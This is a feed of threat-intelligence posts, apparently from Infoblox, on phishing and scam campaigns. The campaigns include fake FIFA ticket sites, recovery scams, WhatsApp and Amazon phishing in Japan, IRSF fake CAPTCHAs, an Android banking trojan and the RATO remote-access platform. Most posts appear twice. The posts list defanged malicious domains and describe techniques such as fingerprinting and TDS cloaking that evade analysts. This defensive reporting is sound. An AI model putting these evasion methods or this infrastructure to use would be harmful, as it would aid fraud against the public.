  24. ⚽ Looking for FIFA World Cup tickets without the queue?

    We're continuously tracking a surge in convincing FIFA lookalike sites we first posted on last month, but this isn't your typical phishing game — it's full‑blown counterfeit ticketing, run like a high‑volume e‑commerce operation.

    Premier League theatrics. Sunday league legitimacy 🎭

    The flow:
    • Land on a polished FIFA clone
    • Auto‑localized content (language, region, pricing)
    • "Checkout" pushed through rotating payment domains

    Behind the curtain:
    • ⚡ High domain churn — fresh registrations daily
    • 🔄 Payment infrastructure swapped in/out to dodge disruption
    • 🪞 Near-perfect mirroring of official FIFA content

    There are indicators pointing to Chinese‑origin operators (hosting patterns, code artifacts), but targeting is global—and scalable.

    The interesting bit? This isn't about stealing creds.

    It's about conversion at scale. Auto-localisation + disposable infrastructure = throughput over stealth.

    No ticket. No refund. Reliable revenue stream.

    While this actor keeps kickin' and churning out new domains, we'll be here tracking the infrastructure... and yes it's because we can't afford a real ticket to the game.

    #dns #threatintel #cybersecurity #infosec #scam #phishing #infoblox #infobloxthreatintel #WorldCup2026 #FIFA

  25. Recovery Scam Season: Second Time’s the Charm? 🎣

    Fallen victim to online fraud and now seeing ads promising to get your money back—fast, guaranteed, no upfront fees?
    ⚠️ 📵 Yeah… about that.

    Victims around the world are being re-targeted by asset recovery scams impersonating INTERPOL, law enforcement agencies, law firms, and other trusted orgs. We've been tracking an actor deploying some slick AI-generated video ads boosted by fake news pages funneling users to polished lure sites promising miracle turnarounds. Talk about a sequel nobody asked for. 🎬

    Here’s the playbook:
    • 🎥 Fake ads pushing recovery services, often impersonating law enforcement →
    • 🌐 Lookalike recovery domains instructing victims to submit contact info →
    • 📞 Outreach via Email, WhatsApp etc. →
    • 🤝 Trust building + fake progress →
    • 💳 “Processing” and "release" fees (and more… and more) until you're rinsed... again.

    Through DNS telemetry, we’ve been tracking this cluster for months—connecting the dots across campaigns long before takedowns hit timelines.

    META recently pulled some INTERPOL-themed ads after Hong Kong media coverage—but plenty remain. The Russian-speaking actor behind this is pivoting fast, spinning up new brands, domains, and “legal services” at scale.

    Recent examples:
    ⛔ europolhelp[.]live
    ⛔ recovery-protocol[.]net
    ⛔ fbi-support[.]live
    ⛔ baseinfo[.]biz

    Still waiting on our recovered funds. Until then, we’ll keep tracking—because while threat actors evolve, DNS remembers.🧠

    #ThreatIntel #Scam #CyberSecurity #DNS #Infoblox #crypto #cybercrime

  26. Recovery Scam Season: Second Time’s the Charm? 🎣

    Fallen victim to online fraud and now seeing ads promising to get your money back—fast, guaranteed, no upfront fees?
    ⚠️ 📵 Yeah… about that.

    Victims around the world are being re-targeted by asset recovery scams impersonating INTERPOL, law enforcement agencies, law firms, and other trusted orgs. We've been tracking an actor deploying some slick AI-generated video ads boosted by fake news pages funneling users to polished lure sites promising miracle turnarounds. Talk about a sequel nobody asked for. 🎬

    Here’s the playbook:
    • 🎥 Fake ads pushing recovery services, often impersonating law enforcement →
    • 🌐 Lookalike recovery domains instructing victims to submit contact info →
    • 📞 Outreach via Email, WhatsApp etc. →
    • 🤝 Trust building + fake progress →
    • 💳 “Processing” and "release" fees (and more… and more) until you're rinsed... again.

    Through DNS telemetry, we’ve been tracking this cluster for months—connecting the dots across campaigns long before takedowns hit timelines.

    META recently pulled some INTERPOL-themed ads after Hong Kong media coverage—but plenty remain. The Russian-speaking actor behind this is pivoting fast, spinning up new brands, domains, and “legal services” at scale.

    Recent examples:
    ⛔ europolhelp[.]live
    ⛔ recovery-protocol[.]net
    ⛔ fbi-support[.]live
    ⛔ baseinfo[.]biz

    Still waiting on our recovered funds. Until then, we’ll keep tracking—because while threat actors evolve, DNS remembers.🧠

    #ThreatIntel #Scam #CyberSecurity #DNS #Infoblox #crypto #cybercrime

  27. Stolen phones - and specifically iPhones - have robust anti-theft protections. They are worthless once they're flagged - locked to their owner. So why are millions still being stolen every year?
    In this paper, we uncover a thriving underground marketplace focused on unlocking stolen phones. It is powered by:

    Lookalike domains impersonating Apple, Xiaomi, Samsung and other brands
    Smishing campaigns targeting device owners
    Pay‑as‑you‑go “unlocking” tools sold on Telegram
    By pivoting on DNS data, we identified 10,000+ malicious domains and a growing ecosystem turning locked devices into profit at scale.

    👉 Read how this supply chain works—from theft to resale—and why it’s growing fast. infoblox.com/blog/threat-intel

    #ThreatIntel #CyberSecurity #Phishing #MobileSecurity #iOS #Smishing #dns #threatintelligence #cybercrime #infosec #infoblox #infobloxthreatintel #threatintelligence #cybercrime  #infosec #infoblox #infobloxthreatintel

  28. Stolen phones - and specifically iPhones - have robust anti-theft protections. They are worthless once they're flagged - locked to their owner. So why are millions still being stolen every year?
    In this paper, we uncover a thriving underground marketplace focused on unlocking stolen phones. It is powered by:

    Lookalike domains impersonating Apple, Xiaomi, Samsung and other brands
    Smishing campaigns targeting device owners
    Pay‑as‑you‑go “unlocking” tools sold on Telegram
    By pivoting on DNS data, we identified 10,000+ malicious domains and a growing ecosystem turning locked devices into profit at scale.

    👉 Read how this supply chain works—from theft to resale—and why it’s growing fast. infoblox.com/blog/threat-intel

    #ThreatIntel #CyberSecurity #Phishing #MobileSecurity #iOS #Smishing #dns #threatintelligence #cybercrime #infosec #infoblox #infobloxthreatintel #threatintelligence #cybercrime  #infosec #infoblox #infobloxthreatintel

  29. WhatsApp, Japan, and a 500% Traffic Spike! 💹 🚨

    To be honest, we thought threat actors were tripping when we saw a new WhatsApp phishing campaign targeting Japanese citizens. Don't they know LINE is the app in Japan? Well, we were surprised because this campaign is actually working…

    The campaign doesn't only impersonate WhatsApp through its phishing page, but also through the lookalike domains it uses. Around 2k "WhatsApp" domain name variations are involved. The actor also leverages RDGAs – mostly for subdomains. Domains like web-rka-whatsapp[.]com[.]cn have up to 32 RDGA subdomains!

    Upon visiting one of these lookalike domains, the user is fingerprinted and only forwarded to the phishing page if they match the intended profile — otherwise they get redirected to sites like bing[.]com or microsoft[.]com. As we show at the image below (with an AI-translated version), the malicious landing page simulates the WhatsApp login screen and encourages victims to scan a malicious QR code with their phone to log in.

    When we found the cluster, we genuinely didn't think this campaign would land in Japan — but we were wrong. In the last 6 months, traffic to these domains has increased more than 500%, and it continues to rise.

    What impact would these top quality lookalikes have if the campaigns were directed at countries where WhatsApp is actually the preferred messaging app?

    Domain sample:
    whatsappweb[.]net
    whatapapp[.]com
    whatsptapp[.]com
    leropaxi-whatsapp[.]com[.]cn

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Quishing #WhatsApp #LINE #Japan #脅威情報 #フィッシング詐欺 #QRコード詐欺 #DNSセキュリティ #Infoblox脅威情報 #WhatsApp #LINEセキュリティ #日本 #サイバーセキュリティ

  30. WhatsApp, Japan, and a 500% Traffic Spike! 💹 🚨

    To be honest, we thought threat actors were tripping when we saw a new WhatsApp phishing campaign targeting Japanese citizens. Don't they know LINE is the app in Japan? Well, we were surprised because this campaign is actually working…

    The campaign doesn't only impersonate WhatsApp through its phishing page, but also through the lookalike domains it uses. Around 2k "WhatsApp" domain name variations are involved. The actor also leverages RDGAs – mostly for subdomains. Domains like web-rka-whatsapp[.]com[.]cn have up to 32 RDGA subdomains!

    Upon visiting one of these lookalike domains, the user is fingerprinted and only forwarded to the phishing page if they match the intended profile — otherwise they get redirected to sites like bing[.]com or microsoft[.]com. As we show at the image below (with an AI-translated version), the malicious landing page simulates the WhatsApp login screen and encourages victims to scan a malicious QR code with their phone to log in.

    When we found the cluster, we genuinely didn't think this campaign would land in Japan — but we were wrong. In the last 6 months, traffic to these domains has increased more than 500%, and it continues to rise.

    What impact would these top quality lookalikes have if the campaigns were directed at countries where WhatsApp is actually the preferred messaging app?

    Domain sample:
    whatsappweb[.]net
    whatapapp[.]com
    whatsptapp[.]com
    leropaxi-whatsapp[.]com[.]cn

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Quishing #WhatsApp #LINE #Japan #脅威情報 #フィッシング詐欺 #QRコード詐欺 #DNSセキュリティ #Infoblox脅威情報 #WhatsApp #LINEセキュリティ #日本 #サイバーセキュリティ

  31. "Run a quick DNS speed test" they said… 🤔

    One click on dns-speed.tail-f[.]de and your browser helpfully fans out ~5,000 HTTPS handshakes to "random" Cisco Top 1M domains in ~30 seconds.

    That randomness is doing a lot of work.

    Across a handful of runs we saw clients touching:

    - Government + defence: *.uscourts.gov, multiple .gov TLDs, and .mil hosts (incl. disa[.]mil, onr[.]navy[.]mil)
    - Microsoft sovereign/GCC High endpoints (dodsuite, usgovcloudapi, etc.)
    - Enterprise collaboration: 100+ Webex, Zoom infra, SharePoint/OneDrive tenants
    - Identity surfaces: 130+ auth/login patterns, Okta/Auth0/Duo tenants
    - Autodiscover for named orgs (useful for pre‑populating phish kits)
    - ~150 banking domains, globally distributed

    All from a page load. No content fetched, just "harmless" handshakes.

    What's interesting isn't malice so much as side‑effects. A "neutral" performance test becomes:

    - A spray of client IPs into sensitive identity and gov endpoints
    - Noisy, hard‑to‑explain telemetry for defenders ("why is this workstation touching DISA?")
    - Occasional redirects into less friendly corners of the web, courtesy of the long tail

    The stated aim is realism (avoid vendor‑optimised test servers). In practice, you inherit the internet's entire distribution of good, bad, and broken—and push it through end‑user browsers.

    It's a reminder that at scale, "just measuring" can look a lot like reconnaissance… or at least generate it for someone else.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel

  32. "Run a quick DNS speed test" they said… 🤔

    One click on dns-speed.tail-f[.]de and your browser helpfully fans out ~5,000 HTTPS handshakes to "random" Cisco Top 1M domains in ~30 seconds.

    That randomness is doing a lot of work.

    Across a handful of runs we saw clients touching:

    - Government + defence: *.uscourts.gov, multiple .gov TLDs, and .mil hosts (incl. disa[.]mil, onr[.]navy[.]mil)
    - Microsoft sovereign/GCC High endpoints (dodsuite, usgovcloudapi, etc.)
    - Enterprise collaboration: 100+ Webex, Zoom infra, SharePoint/OneDrive tenants
    - Identity surfaces: 130+ auth/login patterns, Okta/Auth0/Duo tenants
    - Autodiscover for named orgs (useful for pre‑populating phish kits)
    - ~150 banking domains, globally distributed

    All from a page load. No content fetched, just "harmless" handshakes.

    What's interesting isn't malice so much as side‑effects. A "neutral" performance test becomes:

    - A spray of client IPs into sensitive identity and gov endpoints
    - Noisy, hard‑to‑explain telemetry for defenders ("why is this workstation touching DISA?")
    - Occasional redirects into less friendly corners of the web, courtesy of the long tail

    The stated aim is realism (avoid vendor‑optimised test servers). In practice, you inherit the internet's entire distribution of good, bad, and broken—and push it through end‑user browsers.

    It's a reminder that at scale, "just measuring" can look a lot like reconnaissance… or at least generate it for someone else.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel

  33. Send an SMS to confirm you're a human? That's strange. How about dozens of SMS, to locations all over the world? That sounds more like a hot take on International Revenue Share Fraud (IRSF). Infoblox Threat Intel has come across an operation that defrauds both individuals and telecoms by way of social engineering victims through the use of a fake CAPTCHA process.

    With IRSF, fraudsters generate their revenue by driving call or SMS traffic to numbers to which they have revenue sharing agreements with the local telecoms. Historically, this has been done by methods like hacking an organization's PBX system, or using bots to abuse services that generate one-time-passwords, and directing that call or SMS traffic to numbers under their control.

    This operation, however, takes advantage of individuals' familiarity with the CAPTCHA process, by adding a multi-stage requirement to send bulk SMS to get access to games, videos, or adult content - because of course, these things are so hard to access online otherwise.
    In this case, the victims are two-fold. First, it impacts the people who get unexpected international SMS charges on their bill, and then the telecoms who both pay termination fees to the international destinations telecom, and who also possibly absorb the cost of the chargeback.

    Read more about our investigation into this new flavour of scam, including the specific domains and infrastructure we uncovered, here: infoblox.com/blog/threat-intel

     #threatintel #cybercrime #threatintelligence #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #IRSF #telecom #captcha

  34. Send an SMS to confirm you're a human? That's strange. How about dozens of SMS, to locations all over the world? That sounds more like a hot take on International Revenue Share Fraud (IRSF). Infoblox Threat Intel has come across an operation that defrauds both individuals and telecoms by way of social engineering victims through the use of a fake CAPTCHA process.

    With IRSF, fraudsters generate their revenue by driving call or SMS traffic to numbers to which they have revenue sharing agreements with the local telecoms. Historically, this has been done by methods like hacking an organization's PBX system, or using bots to abuse services that generate one-time-passwords, and directing that call or SMS traffic to numbers under their control.

    This operation, however, takes advantage of individuals' familiarity with the CAPTCHA process, by adding a multi-stage requirement to send bulk SMS to get access to games, videos, or adult content - because of course, these things are so hard to access online otherwise.
    In this case, the victims are two-fold. First, it impacts the people who get unexpected international SMS charges on their bill, and then the telecoms who both pay termination fees to the international destinations telecom, and who also possibly absorb the cost of the chargeback.

    Read more about our investigation into this new flavour of scam, including the specific domains and infrastructure we uncovered, here: infoblox.com/blog/threat-intel

     #threatintel #cybercrime #threatintelligence #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #IRSF #telecom #captcha

  35. Trust this “Amazon” phishing email in Japan—and you’re Prime sashimi 🎣 🍣

    Looking into our malspam data, we identified an active campaign impersonating Amazon and targeting Japanese citizens. The emails use subjects such as 「至急 Amazonプライム会員情報の確認」 (“Urgent: Confirm Amazon Prime member information”).

    The URLs within the emails ultimately lead to an Amazon phishing page, but only after routing victims through a TDS. Interestingly, instead of keeping the TDS step invisible, the actors chose to show it off—repackaging it as a reassuring security check.

    Upon clicking the link within the email, victims are first redirected to an RDGA TDS domain, where fingerprinting occurs. If the user does not match the targeting criteria (e.g., connecting from outside Japan), access is blocked. If they do match, potential victims are redirected to a second RDGA domain.
    This second and last domain is not a TDS domain, but funny enough, these actors decided they would emulate it anyway!

    At that step victims are already at the landing page but instead of immediately displaying a standard Amazon phishing page, the website displays a CAPTCHA and fake console interface simulating environment fingerprinting checks to “make sure your environment and connection is safe” before "proceeding to the landing page". Ironically, part of their message is true: fingerprinting did happen one domain earlier. It just wasn’t for the user’s benefit—it was to make sure the environment was safe… for the scammers. A few seconds later, without added user interaction needed, a fake Amazon login page is displayed.

    Domains samples:
    qqc10c[.]cyou
    51wang11c[.]cyou

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #amazon #malspam #email #fingerprinting #japan

  36. Trust this “Amazon” phishing email in Japan—and you’re Prime sashimi 🎣 🍣

    Looking into our malspam data, we identified an active campaign impersonating Amazon and targeting Japanese citizens. The emails use subjects such as 「至急 Amazonプライム会員情報の確認」 (“Urgent: Confirm Amazon Prime member information”).

    The URLs within the emails ultimately lead to an Amazon phishing page, but only after routing victims through a TDS. Interestingly, instead of keeping the TDS step invisible, the actors chose to show it off—repackaging it as a reassuring security check.

    Upon clicking the link within the email, victims are first redirected to an RDGA TDS domain, where fingerprinting occurs. If the user does not match the targeting criteria (e.g., connecting from outside Japan), access is blocked. If they do match, potential victims are redirected to a second RDGA domain.
    This second and last domain is not a TDS domain, but funny enough, these actors decided they would emulate it anyway!

    At that step victims are already at the landing page but instead of immediately displaying a standard Amazon phishing page, the website displays a CAPTCHA and fake console interface simulating environment fingerprinting checks to “make sure your environment and connection is safe” before "proceeding to the landing page". Ironically, part of their message is true: fingerprinting did happen one domain earlier. It just wasn’t for the user’s benefit—it was to make sure the environment was safe… for the scammers. A few seconds later, without added user interaction needed, a fake Amazon login page is displayed.

    Domains samples:
    qqc10c[.]cyou
    51wang11c[.]cyou

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #amazon #malspam #email #fingerprinting #japan

  37. #Tatort #DNS: Wie das #Internet seine Angreifer verrät mit Renée Burton - #TheyTalkTech – mit Eckert und Wolfangel - #Podcast:

    Das #Telefonbuch des #Internets kennt keine Geheimnisse. Wenn man weiß, wie man es liest. Renée Burton hat 22 Jahre beim #US-Geheimdienst #NSA verbracht und wechselte dann die Seite.

    Als #Head_of_Threat_Intelligence bei der #IT-Security Firma #Infoblox analysiert sie Billionen von #DNS-Anfragen und findet darin, was andere übersehen:...

    frauen-technik.podigee.io/77-n

  38. #Tatort #DNS: Wie das #Internet seine Angreifer verrät mit Renée Burton - #TheyTalkTech – mit Eckert und Wolfangel - #Podcast:

    Das #Telefonbuch des #Internets kennt keine Geheimnisse. Wenn man weiß, wie man es liest. Renée Burton hat 22 Jahre beim #US-Geheimdienst #NSA verbracht und wechselte dann die Seite.

    Als #Head_of_Threat_Intelligence bei der #IT-Security Firma #Infoblox analysiert sie Billionen von #DNS-Anfragen und findet darin, was andere übersehen:...

    frauen-technik.podigee.io/77-n

  39. From call scripts and scams to command and control—Southeast Asia’s scam centres are levelling up.

    In our latest research with Chong Lua Dao, we track a sophisticated Android banking trojan directly to the K99 Triumph City scam compound in Sihanoukville, Cambodia, and the high-ranking political elites behind it.

    Using a combination of technical analysis, infrastructure patterns, and operational visibility provided by former captives, we were able to map thousands of targeted lure and C2 domains used to distribute and administer the malware across Asia, Africa, Europe, and Latin America.

    What we uncovered is a turnkey malware-as-a-service (MaaS) platform sold to scam-centre based criminal networks, including K99, enabling real-time surveillance, credential theft, biometric data exfiltration, and financial fraud on a global scale. Victims are funnelled through domains impersonating government services, financial institutions, e-commerce platforms and airlines, with new domains registered every month.

    In addition to giving criminal operators complete control over infected devices, behind the malware sits a highly coordinated operation. Our investigation unpacks the whole thing, revealing multiple C2 panels organised by country and “customer” as well as the integration of AI-driven tools used to support attacks targeting victims in at least 21 countries and 15 languages.

    What’s more, we have found that there is significant overlap with the infrastructure and business networks attributed to the DNS threat actors Vigorish Viper and Vault Viper, highlighting the continued evolution of the regional cyber threat landscape.

    👉 Read the full report here: infoblox.com/blog/threat-intel
    👉 We spoke to the Economist to explain how the scam centre threat is shifting: economist.com/interactive/asia

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #malware #scam

  40. From call scripts and scams to command and control—Southeast Asia’s scam centres are levelling up.

    In our latest research with Chong Lua Dao, we track a sophisticated Android banking trojan directly to the K99 Triumph City scam compound in Sihanoukville, Cambodia, and the high-ranking political elites behind it.

    Using a combination of technical analysis, infrastructure patterns, and operational visibility provided by former captives, we were able to map thousands of targeted lure and C2 domains used to distribute and administer the malware across Asia, Africa, Europe, and Latin America.

    What we uncovered is a turnkey malware-as-a-service (MaaS) platform sold to scam-centre based criminal networks, including K99, enabling real-time surveillance, credential theft, biometric data exfiltration, and financial fraud on a global scale. Victims are funnelled through domains impersonating government services, financial institutions, e-commerce platforms and airlines, with new domains registered every month.

    In addition to giving criminal operators complete control over infected devices, behind the malware sits a highly coordinated operation. Our investigation unpacks the whole thing, revealing multiple C2 panels organised by country and “customer” as well as the integration of AI-driven tools used to support attacks targeting victims in at least 21 countries and 15 languages.

    What’s more, we have found that there is significant overlap with the infrastructure and business networks attributed to the DNS threat actors Vigorish Viper and Vault Viper, highlighting the continued evolution of the regional cyber threat landscape.

    👉 Read the full report here: infoblox.com/blog/threat-intel
    👉 We spoke to the Economist to explain how the scam centre threat is shifting: economist.com/interactive/asia

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #malware #scam

  41. 💬 Telegram plays an important role in many underground businesses. Threat actors commonly stand up channels to market and support malicious activities such as malware-as-a-service (MaaS) subscriptions. While investigating ScreenConnect servers, a remote access support tool commonly abused by threat actors, we found an interesting business that we had never seen before. This actor used telegram as a storefront and support channel for an underground Remote Access Toolkit Online (RATO) platform. Technically RATO is a service that bundles cPanel and ScreenConnect technology to help its cyber criminal customers remotely access victim machines and manage scams, phishing, and malware (e.g. Latrodectus).

    🐀 🔴 We discovered several servers that matched a ScreenConnect signature but these instances did not serve the typical ScreenConnect web content. Instead, their service is called "RATO PLATFORM" and the portal page shows the slogan "Can't catch the RAT__". We've found several telegram channels that promote services named "RATO", use the rat head logo (see attached image), or the domain rato[.]to. Based on their telegram chat content, it's clear their business model is focused on enabling cybercrime.

    @rato_support
    @ratofaqs
    @rato_backup
    @rato_hosting
    @Rato2_bot

    Consistent with RATO’s “BulletProof & Anti-Red Hosting” feature, we saw many RATO instances on ASNs with a high concentration of malicious activity (e.g., AS202412). Additionally, RATO infrastructure shows strong ties to Indonesia including Indonesian IP addresses in passive DNS and domains within the same cloudflare account used for serving online gambling to Indonesian-speaking users. Collectively, RATO and its customers operate a large number of domains. Here are some examples:

    asakusubinitohas[.]com
    bmw320ikaka[.]co
    cpusx[.]com
    newoneazu[.]com
    ratmail[.]pro
    rato[.]page
    rato[.]to
    ratodemo[.]pro
    sesrecipt[.]com
    silk-gen[.]com
    sunostart[.]com
    viewyourstatementonline[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #malware #maas #telegram #indonesia #screenconnect #latrodectus #rat #rmm #remotemonitoringmanagement #downloader #spam #rato

  42. 💬 Telegram plays an important role in many underground businesses. Threat actors commonly stand up channels to market and support malicious activities such as malware-as-a-service (MaaS) subscriptions. While investigating ScreenConnect servers, a remote access support tool commonly abused by threat actors, we found an interesting business that we had never seen before. This actor used telegram as a storefront and support channel for an underground Remote Access Toolkit Online (RATO) platform. Technically RATO is a service that bundles cPanel and ScreenConnect technology to help its cyber criminal customers remotely access victim machines and manage scams, phishing, and malware (e.g. Latrodectus).

    🐀 🔴 We discovered several servers that matched a ScreenConnect signature but these instances did not serve the typical ScreenConnect web content. Instead, their service is called "RATO PLATFORM" and the portal page shows the slogan "Can't catch the RAT__". We've found several telegram channels that promote services named "RATO", use the rat head logo (see attached image), or the domain rato[.]to. Based on their telegram chat content, it's clear their business model is focused on enabling cybercrime.

    @rato_support
    @ratofaqs
    @rato_backup
    @rato_hosting
    @Rato2_bot

    Consistent with RATO’s “BulletProof & Anti-Red Hosting” feature, we saw many RATO instances on ASNs with a high concentration of malicious activity (e.g., AS202412). Additionally, RATO infrastructure shows strong ties to Indonesia including Indonesian IP addresses in passive DNS and domains within the same cloudflare account used for serving online gambling to Indonesian-speaking users. Collectively, RATO and its customers operate a large number of domains. Here are some examples:

    asakusubinitohas[.]com
    bmw320ikaka[.]co
    cpusx[.]com
    newoneazu[.]com
    ratmail[.]pro
    rato[.]page
    rato[.]to
    ratodemo[.]pro
    sesrecipt[.]com
    silk-gen[.]com
    sunostart[.]com
    viewyourstatementonline[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #phishing #malware #maas #telegram #indonesia #screenconnect #latrodectus #rat #rmm #remotemonitoringmanagement #downloader #spam #rato

  43. ⚽ Threat actors are warming up for the 2026 World Cup—and they’re targeting fans early.

    We’ve observed FIFA ticket phishing pages on domains such as fifa[.]bio and ww-fifa[.]com, distributed through malicious spam emails and Facebook ad campaigns. These sites prompt a bogus FIFA ID login to purchase tickets, then transition to a checkout flow collecting personal and payment information.

    Payment flows redirect to actor-controlled domains (pay[.]fifa-com[.]com) or Stripe checkout pages with inconsistent merchants (we observed some with suspicious Romanian LLC names).

    These recently-registered domains are mostly Cloudflare-hosted, spread across various TLDs, and consistently abuse FIFA branding. If it’s a suspicious domain in your inbox or feed, assume it’s not official. 🛑 ⚽

    Domain sample: fifa-2026[.]homes, fifa-com[.]media, www-fifa-com[.]website, vvww-fifa[.]com, fifa-26-worldcup[.]com

    #dns #infoblox #infobloxthreatintel #threatintel #threatintelligence #cybercrime #cybersecurity #FIFA #WorldCup2026 #phishing #scam #lookalikes

  44. ⚽ Threat actors are warming up for the 2026 World Cup—and they’re targeting fans early.

    We’ve observed FIFA ticket phishing pages on domains such as fifa[.]bio and ww-fifa[.]com, distributed through malicious spam emails and Facebook ad campaigns. These sites prompt a bogus FIFA ID login to purchase tickets, then transition to a checkout flow collecting personal and payment information.

    Payment flows redirect to actor-controlled domains (pay[.]fifa-com[.]com) or Stripe checkout pages with inconsistent merchants (we observed some with suspicious Romanian LLC names).

    These recently-registered domains are mostly Cloudflare-hosted, spread across various TLDs, and consistently abuse FIFA branding. If it’s a suspicious domain in your inbox or feed, assume it’s not official. 🛑 ⚽

    Domain sample: fifa-2026[.]homes, fifa-com[.]media, www-fifa-com[.]website, vvww-fifa[.]com, fifa-26-worldcup[.]com

    #dns #infoblox #infobloxthreatintel #threatintel #threatintelligence #cybercrime #cybersecurity #FIFA #WorldCup2026 #phishing #scam #lookalikes

  45. 🚨 Tax Season, Scam Season: Lookalike Domains Target Spain’s Agencia Tributaria

    Today (April 8), the tax filing and refund period officially starts in Spain — and as expected, so do the scams.

    We’ve identified multiple new registrations of lookalike domains impersonating Spain’s official tax authority (Agencia Tributaria) happening over the past weeks, including:

    agenciatributaria-gob[.]com
    agencia-tributaria[.]im
    agenciatributaria[.]de
    sede-agenciatributaria[.]com

    Threat actors moved so fast that some campaigns were launched before the official refund process even started, already promising generous (and obviously fake) tax refunds.

    For example, agencia-tributaria[.]im advertises refunds of €250+ — a clear lure.

    Laughs aside, while they may not be the smartest in terms of timing, they are learning new tricks. We’ve been talking a lot about TDSs lately, and they seem to like them too.

    That same domain redirects users almost instantly to a malicious phishing landing page if they match the attacker’s targeting criteria. However, when accessed from a Linux virtual machine, fingerprinting likely flags a security analyst environment — and suddenly you’re redirected to the lovely and familiar "google[.]com" page, never seeing a second of the phishing content. The same seems to occur if you access it from another country.

    They may have been fast starting their campaigns (maybe too fast)…but we’re faster finding them!

    #dns #infoblox
    #infobloxthreatintel
    #threatintel
    #threatintelligence
    #cybercrime
    #cybersecurity #phishing #scam
    #spain #agenciatributaria #declaraciondelarenta

  46. 🚨 Tax Season, Scam Season: Lookalike Domains Target Spain’s Agencia Tributaria

    Today (April 8), the tax filing and refund period officially starts in Spain — and as expected, so do the scams.

    We’ve identified multiple new registrations of lookalike domains impersonating Spain’s official tax authority (Agencia Tributaria) happening over the past weeks, including:

    agenciatributaria-gob[.]com
    agencia-tributaria[.]im
    agenciatributaria[.]de
    sede-agenciatributaria[.]com

    Threat actors moved so fast that some campaigns were launched before the official refund process even started, already promising generous (and obviously fake) tax refunds.

    For example, agencia-tributaria[.]im advertises refunds of €250+ — a clear lure.

    Laughs aside, while they may not be the smartest in terms of timing, they are learning new tricks. We’ve been talking a lot about TDSs lately, and they seem to like them too.

    That same domain redirects users almost instantly to a malicious phishing landing page if they match the attacker’s targeting criteria. However, when accessed from a Linux virtual machine, fingerprinting likely flags a security analyst environment — and suddenly you’re redirected to the lovely and familiar "google[.]com" page, never seeing a second of the phishing content. The same seems to occur if you access it from another country.

    They may have been fast starting their campaigns (maybe too fast)…but we’re faster finding them!

    #dns #infoblox
    #infobloxthreatintel
    #threatintel
    #threatintelligence
    #cybercrime
    #cybersecurity #phishing #scam
    #spain #agenciatributaria #declaraciondelarenta

  47. Keitaro series, Part 3: What happens when we zoom out from individual campaigns and examine the broader ecosystem of Keitaro abuse?

    In the third and final installment on Keitaro, we take a step back to analyze cross‑campaign trends and the Keitaro features most frequently abused at scale. We also look at cookies and cracked versions tied to threat actors like TA2726, and share what provider engagement and takedowns actually look like in practice.

    infoblox.com/blog/threat-intel

    #dns #infoblox #infobloxthreatintel #threatintel #threatintelligence #cybercrime #cybersecurity #keitaro #adtech #tds

  48. Keitaro series, Part 3: What happens when we zoom out from individual campaigns and examine the broader ecosystem of Keitaro abuse?

    In the third and final installment on Keitaro, we take a step back to analyze cross‑campaign trends and the Keitaro features most frequently abused at scale. We also look at cookies and cracked versions tied to threat actors like TA2726, and share what provider engagement and takedowns actually look like in practice.

    infoblox.com/blog/threat-intel

    #dns #infoblox #infobloxthreatintel #threatintel #threatintelligence #cybercrime #cybersecurity #keitaro #adtech #tds

  49. We planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
    So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.

    Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.

    If you hunt threats distributed via adtech, these indicators can be useful pivots. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting

  50. We planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
    So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.

    Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.

    If you hunt threats distributed via adtech, these indicators can be useful pivots. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting

